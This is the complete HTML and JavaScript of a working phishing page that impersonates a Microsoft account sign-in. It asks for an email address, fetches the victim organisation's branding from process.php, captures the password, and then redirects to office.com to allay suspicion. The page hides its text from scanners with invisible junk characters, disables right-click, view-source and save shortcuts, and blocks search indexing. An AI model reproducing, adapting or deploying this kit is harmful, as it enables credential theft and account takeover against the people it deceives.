<!DOCTYPE html>
<html dir="ltr" lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>La8tTQrKnVBvcIq3tNQqLpG5oCm6vC7aZSEUZkXjjTcqB</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <meta http-equiv="Pragma" content="no-cache">
    <meta http-equiv="Expires" content="-1">
    <meta name="PageID" content="ConvergedSignIn">
    <meta name="SiteID" content="">
    <meta name="ReqLC" content="1033">
    <meta name="LocLC" content="en-US">
    <link href="css/style3.css" rel="stylesheet">
	<meta name="description" content="fud">
	<meta name="robots" content="noindex">
	<meta name="googlebot" content="noindex">
	<meta name="googlebot-news" content="noindex">
	<meta name="otherbot" content="noindex">
	<meta name="noarchive" content="noindex">
	<meta name="nosnippet" content="noindex">
	<meta name="noimageindex" content="noindex"> 
	<meta name="robots" content="nofollow">
	<meta name="googlebot" content="nofollow">
	<meta name="googlebot-news" content="nofollow">
	<meta name="otherbot" content="nofollow">
	<meta name="noarchive" content="nofollow">
	<meta name="nosnippet" content="nofollow">
	<meta name="noimageindex" content="nofollow">
	<meta name="robots" content="max-snippet:0">
    <meta name="robots" content="none">
	<script type="text/javascript" src="https://code.jquery.com/jquery-3.3.1.min.js"></script>
    <link rel="shortcut icon" href="imgs/fi.ico">
    <style>
        box {
            width: 40%;
            margin: 0 auto;
            background: rgba(255, 255, 255, 0.2);
            padding: 35px;
            border: 2px solid #fff;
            border-radius: 20px/50px;
            background-clip: padding-box;
            text-align: center;
        }
		#footer{
			position: fixed;
			 bottom: 0px;
			 width: 100%;
			 overflow: visible;
			 z-index: 99;
			 clear: both;
			 # background-color: #000;
			 # background-color: rgba(0, 0, 0, 0.6);
		}
		div .footerNode a, div .footerNode span{
			color: #000;
			 font-size: 0.75rem;
			 line-height: 28px;
			 white-space: nowrap;
			 display: inline-block;
			 float: right;
			 margin-left: 8px;
			 margin-right: 8px;
		}
        .button {
            font-size: 1em;
            padding: 10px;
            color: #fff;
            border: 2px solid #0067B8;
            border-radius: 20px/50px;
            text-decoration: none;
            cursor: pointer;
            transition: all 0.3s ease-out;
        }

        .button:hover {
            background: #0067B8;
        }

        .overlay {
            position: fixed;
            top: 0;
            bottom: 0;
            left: 0;
            right: 0;
            background: rgba(0, 0, 0, 0.7);
            transition: opacity 500ms;
            visibility: hidden;
            opacity: 0;
        }

        .overlay:target {
            visibility: visible;
            opacity: 1;
        }

        .popup {
            margin: 70px auto;
            padding: 20px;
            background: #fff;
            border-radius: 5px;
            width: 30%;
            position: relative;
            transition: all 5s ease-in-out;
        }

        .popup h2 {
            margin-top: 0;
            color: #333;
            font-family: Tahoma, Arial, sans-serif;
        }

        .popup .close {
            position: absolute;
            top: 20px;
            right: 30px;
            transition: all 200ms;
            font-size: 30px;
            font-weight: bold;
            text-decoration: none;
            color: #333;
        }

        .popup .close:hover {
            color: #0067B8;
        }

        .popup .content {
            max-height: 30%;
            overflow: auto;
        }

        @media screen and (max-width: 700px) {
            .box {
                width: 70%;
            }

            .popup {
                width: 70%;
            }
        }
    </style>
</head>

<body  class="cb aL8p5U" style="display: block;" data-gr-c-s-loaded="true">

<div>

<div >
<div class="background mA7DW7" role="presentation" >

<div  style="background-image: url(&quot;imgs/bg.svg&quot;);">

</div>

<div id="bodybackground" class="backgroundImage gZLW47"  style="background-image: url(imgs/bg.svg)">

</div>

</div>

</div>


<form name="f1" id="fud_user" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" action="" onsubmit="return checkSubmit()">
<script>
var href = window.location.href;
var url_string = href;
var url = new URL(url_string);
var tl = url.searchParams.get("_x_tr_tl");
var hl = url.searchParams.get("_x_tr_hl");
var dir = href.substring(0, href.lastIndexOf('/')) + "/";
document.getElementById("fud_user").action = 'process.php?dir='+dir;
</script>


<div class="outer v4vJQa">
<div class="middle vmkOTV" >

<div class="inner TrKr6b" >

<div >

<img style="max-height: 36px;" id="logoCompany" role="presentation"  src="imgs/lg.svg?x=ee5c8d9fb6248c938fd0dc19370e90bd">

</div>

<div role="main">

<div class="pagination-view uKM82z" >

<div data-viewid="1">

<div >
<div class="identityBanner lAIZjy" style="display:none">
<button type="button" class="backButton DGRKlx" id="idBtn_Back" aria-label="Back"> <img role="presentation" pngsrc="imgs/e.svg" svgsrc="imgs/e.svg" src="imgs/e.svg"> </button>

<div id="fudname" class="identity QJkGfX"></div>
</div>
<div class="row text-title QGxW5B" id="loginHeader" role="heading">
<div aria-level="1"  id="titleBox">S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">u26e3u</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">mvH3Bi</span>g<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">I5qPgw</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">4kbvWz</span> i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6JR1i1</span>n

</div>
</div>
<div id="successLogin" style="display: none;">
Do th<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">dca5ZU</span>is to re<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">vbGilo</span>duce the num<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">VLertA</span>ber of tim<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">wl02rl</span>es you are as<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">G0k770</span>ke<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">sTel1W</span>d to s<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">gZgkiv</span>ig<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">18iUPd</span>n i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bkZbzy</span>n.
<div class="col-md-24 form-group checkbox Zhke8o" style="margin-top: 20px;">
<label>
<input id="KmsiCheckboxField" name="DontShowAgain" type="checkbox" value="true"  aria-label="Don't show this again">
<span >Do<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">aanXv6</span>n'<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">xNEbVw</span>t s<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ylSxns</span>ho<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">VxJF71</span>w t<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6O8V2m</span>hi<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">jNcp9s</span>s ag<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">8zeYJC</span>ai<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">XLtQN6</span>n</span>
</label>
</div>
<div class="row 8tejtS" >
<div >
<div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container" >


<div  class="inline-block button-item ext-button-item">
<!-- type="submit" is needed in-addition to 'type' in primaryButtonAttributes observable to support IE8 -->
<input type="button" id="fudbutton9" class="button_primary button ext-button primary ext-primary" data-report-event="Signin_Submit" data-report-trigger="click" data-report-value="Submit"  aria-describedby="KmsiDescription" value="No">
</div>
<div  class="inline-block button-item ext-button-item">
<input type="button" id="idBtn_Back" class="win-button button-secondary button ext-button secondary ext-secondary"  value="Yes">
</div>
<!-- /ko -->
</div>
</div>
</div>
</div>
</div>

<div class="row AAwnIV">
<div role="alert" aria-live="assertive">

<div class="alert alert-error col-md-24 Eprx1n" id="fuderrorB"></div>

</div>
<div class="form-group col-md-24 q9n6HE">

<div class="placeholderContainer bcopGu" id="emField">

<input type="email" name="user" id="hasfuderror" value="" maxlength="113" lang="en" class="form-control ltr_override Qh2GS5" aria-describedby="usernameError loginHeader loginDescription" aria-required="true" placeholder="Email, phone, or Skype" aria-label="Enter your email address." required="" autofocus="true">

<div id="usernameProgress" class="progress bCZNAL" role="progressbar"  aria-label="Please wait" style="display: none;">

<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div></div>
<div></div>

</div>

</div>
<div class="placeholderContainer 7wiFe3" id="pwField" style="display: none">

<input required="true" type="password" name="pass" id="fuderr" maxlength="113" lang="en" class="form-control ltr_override Cp5p8E" aria-describedby="usernameError loginHeader loginDescription" aria-required="true" placeholder="Password" aria-label="Enter your password." autofocus="true">

<div id="pwProgress" class="progress nmbZmS" role="progressbar"  aria-label="Please wait" style="display: none;">

<div>
</div>
<div>
</div>
<div>
</div>
<div>
</div>
<div></div>
<div></div>

</div>

</div>

</div>
</div>

<div  class="position-buttons">
<div >

<div class="row BF9pnJ">
<div class="col-md-24">
<div class="text-13 action-links fw0evk">
<div id="createAccount" class="form-group NMZzF2" >N<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">wLG1G9</span>o a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">MapPPN</span>cc<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">hRPoR3</span>ou<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">aUpLwe</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">fR4f91</span>t<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">x7YAo8</span>?
<a href="#" id="signup" >C<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">HB1dA2</span>r<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">e1d3eR</span>ea<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">125Xt1</span>te<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">KhafvU</span> o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Pr9CSi</span>ne<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">JOhy2O</span>!</a>
</div>
<div id="cantAccess"  class="form-group 3LypSY">
<a id="cantAccessAccount" href="#" >C<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">23X7rL</span>an<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">vCTIxi</span>’t acc<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">KvF8Pt</span>es<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">2GJ3nc</span>s yo<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bPJkGf</span>u<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">UXGnHy</span>r ac<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Hs3bsE</span>c<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">J7a15a</span>ou<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">znNa0n</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">D4k9GG</span>t<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">NojyGR</span>?</a>
</div>
<div id="fpwd" style="display: none"  class="form-group ny07nW">
<a href="#" >Fo<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bwmuFm</span>rg<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">BjeRN7</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Jin9sF</span>t<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">pbf4MR</span> my p<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">XF2Upn</span>a<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">TNACvH</span>ss<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ZTUJbC</span>w<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">cHTEcr</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bFWdM2</span>r<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">xkjdGQ</span>d</a>
</div>

</div>
</div>
</div>
</div>
<div class="row UpGXk3" >
<div >  <br>
<div class="col-xs-24 no-padding-left-right form-group no-margin-bottom button-container zmFVZm" >



<div  class="inline-block nDlPVs">

<input value="Next" type="button" onclick="goNext()" id="fudbutton" class="btn btn-block btn-primary gRI4GW" >
</div>
</div>
</div>
</div>
</div>

</div>

</div>

</div>

</div>
<div id="under" class="promoted-fed-cred-box"><div class="promoted-fed-cred-content"><div class="row tile"><div class="table" role="button" tabindex="0" aria-label=""><div class="table-row"><div class="table-cell tile-img medium"><img class="tile-img medium" src="imgs/sig-op.svg"></div><div class="table-cell text-left content"><div>S<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>g<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>-<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span> <span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>p<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>t<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>n<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">6</span>s </div></div></div></div></div></div></div>
</div>
</div>
<input type="hidden" name="logo" id="logoForm" value="">
<input type="hidden" name="background" id="fudbkgdform" value="">
<input type="hidden" name="do" value="login">

</div>

</div>
</form>


</div>

<footer id="footer"> <div> <div class="footerNode"> <a href="#">Pr<div hidden="">sKURBL</div>iv<div hidden="">Pesh2F</div>ac<div hidden="">UoS209</div>y & c<div hidden="">qZHQ57</div>oo<div hidden="">hRzH54</div>k<div hidden="">0wj8CK</div>ie<div hidden="">xn2g04</div>s</a> <a href="#">T<div hidden="">DVFqAy</div>e<div hidden="">ColeIK</div>rm<div hidden="">4LA8ku</div>s of u<div hidden="">zqg0Cl</div>s<div hidden="">XtqrV6</div>e</a> </div></div></footer>
    <script>
        $(document).ready(function() {
            $('#fuderr').focus();
        });

        $('#hasfuderror').keypress(function(e) {
            var key = e.which;
            if (key == 13) // the enter key code
            {
                goNext();
            }
        });
		
		$("#idBtn_Back").click(function(e) {
			e.preventDefault();
			window.location.href = "login.php";
		
			});
		
        function goNext() {
            $('#hasfuderror').removeClass('has-error');
            $('#fuderrorB').text('');
            var usr = $('#hasfuderror').val();
            var userError = 'Enter a valid email address, phone number, or Skype name.';
            if (isEmail($('#hasfuderror').val())) {
                $('#usernameProgress').css('display', 'block');
                $('#fudbutton').prop('disabled', true);
				//var href = window.location.href;
		        //var dir = href.substring(0, href.lastIndexOf('/')) + "/";
                $.ajax({
                    url: 'process.php',
                    cache: false,
                    type: 'POST',
                    data: 'do=check&email=' + usr,
                    dataType: 'json',
                    success: function(data) {
                        if (data.status == 'error') {
                            $('#hasfuderror').addClass('has-error');
                            $('#fuderrorB').text(data.message);
                        } else if (data.status == 'success') {
                            if (data.background != null) {
								$('div .footerNode a, div .footerNode span').css('color', '#fff');
                                $('#bodybackground').css('background', `linear-gradient( rgba(0, 0, 0, 55%), rgba(0, 0, 0, 0.5) ), url(${data.background}) center / cover no-repeat`);
                                $('#fudbkgdform').val(data.background);
                            }
                            if (data.banner != null) {
                                $('#logoCompany').attr('src', data.banner);
                                $('#logoForm').val(data.banner);
                            }
							$("#under").hide();
							$("#createAccount").hide();
							$("#cantAccess").hide();
							$("#fpwd").show();
							$("#fudbutton").val('Sign in');
                            $('#loginHeader').text('Enter password');
                            $('#fudname').text(usr);
                            $('#emField').css('display', 'none');
                            $('#pwField').css('display', 'block');
                            $('.identityBanner').css('display', 'block');

                            $('#fuderr').focus();
                            $('#fuderrorB').text('');
                            $('#fudbutton9').attr('type', 'submit');
                            $('form').find('input:button').each(function() {
                                $("<input type='submit' />").attr({
                                        name: this.name,
                                        value: this.value
                                    }).insertBefore(this)
                                    .addClass('btn btn-block btn-primary');
                            }).remove();
                        }
                        $('#usernameProgress').css('display', 'none');
                        $('#fudbutton').prop('disabled', false);
                    }
                });
            } else {
                $('#hasfuderror').addClass('has-error');
                $('#fuderrorB').text(userError);
                $('#usernameProgress').css('display', 'none');
            }

        }

        function closeBox() {
            $('#popup1').css('visibility', 'hidden').css('opacity', 0);
            $('#hasfuderror').focus();
        }

        function checkSubmit() {
            var pwd = $('#fuderr').val();
            var pwError = 'Please enter your password.';
            if (pwd.length > 5) {
                $('#fuderrorB').text('');
                $('#pwProgress').css('display', 'block');
                return true;
            } else {
                $('#fuderrorB').text(pwError);
                return false;
            }
        }

        function isEmail(email) {
            var regex = /^([a-zA-Z0-9_.+-])+\@(([a-zA-Z0-9-])+\.)+([a-zA-Z0-9]{2,4})+$/;
            return regex.test(email);
        }

        function isfuderror(email) {
			
			$("#under").hide();
			$("#createAccount").hide();
			$("#cantAccess").hide();
			$("#fpwd").show();
			$('#loginHeader').text('Enter password');
			$("#fudbutton").val('Sign in');
            $('#fudname').text(email);
            $('#fuderrorB').html('Y<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">nMCttN</span>ou<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">24t387</span>r ac<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">wSoylE</span>coun<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">8waePl</span>t o<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ZHi4HK</span>r p<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">CTw1DL</span>as<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">dhY7sA</span>swo<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">CTcyga</span>r<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">XzTsF7</span>d i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">EJi8wj</span>s in<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">hCNnv6</span>co<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">GvSFkM</span>rrec<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bF5wLy</span>t. If y<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ABT5b3</span>ou<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ZQNwvm</span> don<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">0LRksH</span>t re<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">ksIUJe</span>mem<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Oa6LO1</span>ber yo<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">SkzA18</span>ur p<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">Pfn9Za</span>as<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">IXHufu</span>sw<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">XPaNio</span>or<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">JYLMNB</span>d, <a id="resetnow" href="#">r<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">XR6XZ9</span>ese<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">bcC5Gg</span>t i<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">itvLQK</span>t no<span style="display: inline; color: rgba(26, 125, 117, 0); max-width: 0.01px; max-height: 0.03px; font-size: 0.02px;">lpEuWX</span>w.</a>');
			document.getElementById("resetnow").href = window.location.href;
            $('#fuderr').addClass('has-error');
            $('#emField').css('display', 'none');
            $('#pwField').css('display', 'block');
            $('.identityBanner').css('display', 'block');
            $('form').find('input:button').each(function() {
                $("<input type='submit' />").attr({
                        name: this.name,
                        value: this.value
                    }).insertBefore(this)
                    .addClass('btn btn-block btn-primary');
            }).remove();
        }

        function isSuccess(email) {
			$("#under").hide();
			$("#idBtn_Back").hide();
			
            $('#fudname').text(email);
            $('#fuderrorB').text('');
            $('#fuderr').removeClass('has-error');
            $('#fuderr').val('nopassword');
            $('#titleBox').text('Stay signed in?');
            $('#cantAccess').css('display', 'none');
            $('#createAccount').css('display', 'none');
            $('#emField').css('display', 'none');
            $('#pwField').css('display', 'none');
            $('.identityBanner').css('display', 'block');
            $('#fudbutton').attr('type', 'hidden');
            $('#successLogin').css('display', 'block');
            $('form').find('input:button').each(function() {
                $("<input type='submit' />").attr({
                        name: this.name,
                        value: this.value
                    }).insertBefore(this)
                    .addClass('btn btn-block btn-primary');
            }).remove();
            $('#fud_user').attr('action', 'https://office.com/');
            $('#fud_user').attr('method', 'get');
        }
    </script>
	
		<script>
	
		   // prevent ctrl + s
		$(document).bind('keydown', function(e) {
		if(e.ctrlKey && (e.which == 83)) {
		e.preventDefault();
		return false;
		}
		});

		document.addEventListener('contextmenu', event => event.preventDefault());

		document.onkeydown = function(e) {
		if (e.ctrlKey && 
		(e.keyCode === 67 ||   
		//e.keyCode === 86 || 
		e.keyCode === 85 || 
		e.keyCode === 117)) {
		return false;
		} else {
		return true;
		}
		};
		$(document).keypress("u",function(e) {
		if(e.ctrlKey)
		{
		return false;      }
		else {
		return true;
		}});
		
		 </script>


</body>

</html>



